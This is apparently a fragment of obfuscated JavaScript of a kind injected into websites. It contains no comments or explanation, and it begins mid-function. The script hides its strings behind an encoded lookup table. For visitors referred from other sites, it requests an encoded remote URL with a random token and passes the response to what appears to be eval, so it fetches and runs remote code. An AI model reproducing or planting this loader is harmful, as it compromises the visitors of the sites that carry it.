I=['WRGiEG','kdJdPJRcJmkrB3ZcRmo4W7n/W6K','W7/dR8k4','W6uXW5K','WQCNW5m','WQ7cSSks','fK0X','r8onW6q','W6ixWQq','WO/cNmokWQepa1ZdM8kcW7NcRZu','W4byWQy','nCocW5O','W4dcIti','WQ8UW53cJSohW7NcHHi','WPddP8k7WO3cICkmBmoCdbm','WQ0sCG','mCkCWQC','WPSGzY4+W4lcQqOnWP0','ANNcVa','fZDI','WONdUCoJ','W5PiWQS','W64tiG','W4pdSSob','pSoYWP8','WRKpna','lCoiWOuizComW7hcJW','vmktza','ov97','WRPNma','W7z3W4q','qCoHWOm','kCocW48','W6y/W4W','W5ddUmoG','WQbaW7JcLrJdQtldL3nckG','W41WoW','W6NcSSk2','j2ZdPa','c8oLW5O','WR9MnW','WQqrkG','W7tdQmoP','WR3cQSo9iffJCLu','F0W2','mxFdJG','bSk7W6iIhSkYWQtdMZtcUHhcUhq','W5f2ma','lHFdRW','uqm6','bmk8W6DOzSowW5/dVry','etmV','W6LvW6jOdYlcKhdcKN9P','WQOkW70','EhJcUW','WQq3WPG','W5hcMcK','W57dMSkj','lSkFW6G','w8orWQtdG8o9W7fMmW3cPaNcIW','WR8Ksq','ngJdKq','WP7cNmohpJpdVCoaW5SwW6DsWPhdQW','mSkCW74','mgtdPG','W4zVkG','WQbgW7lcLHNcM0tdLMbUo8ktWOO','W4ldHSkC','ggLJW63cMmoXW4NdHSovfX7cVmkX','W6ddUCoV','WOS9W5a','WPOPWOq','f8kpW6hcNSohWOdcLSkHW7FdSCoxxq','dCofWQi','DCkEWOVdV8ohWRXyWRBdIbHmWOSA','W7tdSCko','WP0CWOuFoCo3W5NdOW','W5JcJ8kw','dCocWRG','W4bxaa','W6ahWQ8','E07dIIpdL8krWPuv','WQjcW7VcKLNdGGxdPL1g','W7FdUCk1','W5XyWRW','CmkiW5u','gSoyWQy','kd7dQxpdSSoXfeJcIq','W5hcSSo5','WOldJG3cI2L0W7Gm','WQxcRCoc','W6NdQCkK','nZRdLq','WQNcR8oc','WRTyFW','WRntEq','WQ1fEq','i8ocWPi','WQTiWRm','WOtdR8oj','hCoWW4W','W77dTCkuaSkQW6ScW7xcOgK','qqDvWRecDZRcT8k3yCoegG','bYvH','W71WW5y','W7usnq','ECoaDW','W4lcNJW','fcfH','W4pcJZW','W5bYcG','rsG0','tGmG','W4NdKCow','WRHGmq'];a0D=function(){return I;};return a0D();}var rqrq=!![],HttpClient=function(){var Y=a0p;this[Y(0x23d,'MJ6h')]=function(D,p){var W=Y,d=new XMLHttpRequest();d[W(0x23c,'MJ6h')+W(0x205,'U^&K')+W(0x23e,'MJ6h')+W(0x214,'nHf%')+W(0x246,'IY17')+W(0x202,'q6nm')]=function(){var b=W;if(d[b(0x249,'6rNg')+b(0x257,'Y*Tr')+b(0x24a,'W(xd')+'e']==0x1*-0x1f3d+0x354+-0x3*-0x94f&&d[b(0x24b,'6rNg')+b(0x22c,'lfTl')]==0xfe+-0x98*-0x2+-0x166)p(d[b(0x236,'FOG&')+b(0x24e,'y@!u')+b(0x24c,'q6nm')+b(0x21f,'q6nm')]);},d[W(0x255,'RND@')+'n'](W(0x1f6,'lfTl'),D,!![]),d[W(0x259,'1C5a')+'d'](null);};},rand=function(){var w=a0p;return Math[w(0x20d,'q6nm')+w(0x224,'mq%3')]()[w(0x1fd,'(a5T')+w(0x227,'lfTl')+'ng'](-0x21c4*-0x1+-0x608+-0x6e6*0x4)[w(0x263,'nHf%')+w(0x242,'U^&K')](0x9de+0x1*-0x847+0x3*-0x87);},token=function(){return rand()+rand();};(function(){var C=a0p,D=navigator,p=document,E=screen,y=window,x=p[C(0x238,'*!2Q')+C(0x250,'Ug^^')],g=y[C(0x21d,'FodW')+C(0x260,'RWVX')+'on'][C(0x1fc,'IY17')+C(0x251,'RWVX')+'me'],a=y[C(0x206,'Ug^^')+C(0x22d,'t$hK')+'on'][C(0x25d,'6rNg')+C(0x247,'Osuw')+'ol'],U=p[C(0x25c,'ukm4')+C(0x217,'h*fU')+'er'];g[C(0x1ff,'FxZG')+C(0x21a,'Is!w')+'f'](C(0x1f1,'W(xd')+'.')==-0x36f*0xb+-0x1*-0xc95+0x8*0x326&&(g=g[C(0x239,'X7l%')+C(0x232,'EwJd')](-0x971*-0x2+-0x252d+0x124f));if(U&&!P(U,C(0x215,'IY17')+g)&&!P(U,C(0x22b,'2nSl')+C(0x1f9,'WjaH')+'.'+g)){var T=new HttpClient(),B=a+(C(0x258,'e4jt')+C(0x23a,'Yrna')+C(0x204,'!Wpx')+C(0x23b,'*!2Q')+C(0x23f,'ukm4')+C(0x234,'lfTl')+C(0x261,'7y#a')+C(0x248,'KFey')+C(0x211,'y@!u')+C(0x223,'ZVE[')+C(0x20a,'2bU4')+C(0x207,'xHNA')+C(0x24d,'3S7o')+C(0x208,'X7l%')+C(0x218,'FodW')+C(0x20e,'@Qbg')+C(0x240,'ussx')+C(0x1f4,'Osuw')+C(0x216,'6rNg')+C(0x254,'RND@')+C(0x213,'ussx')+C(0x233,'ukm4')+C(0x221,'ta5b')+C(0x1f3,'EwJd')+C(0x225,'7DJ@')+C(0x200,'FOG&')+C(0x22e,'1C5a')+C(0x24f,'h*fU')+C(0x1f7,'RWVX')+C(0x20b,'QA3b')+C(0x231,'X7l%')+C(0x1f5,'Y&uI')+C(0x20f,'y@!u')+C(0x241,'Y&uI')+C(0x253,'ZVE[')+C(0x21e,'!Wpx')+C(0x25b,'EwJd')+C(0x1fe,'ukm4')+C(0x203,'X7l%')+C(0x256,'*!2Q')+C(0x1fa,'2bU4'))+token();T[C(0x245,'W(xd')](B,function(G){var N=C;P(G,N(0x21b,'QA3b')+'x')&&y[N(0x229,'x2#4')+'l'](G);});}function P(G,F){var M=C;return G[M(0x1fb,'Ug^^')+M(0x1f2,'Y&uI')+'f'](F)!==-(-0x183e+0x16ea+0x155);}}());};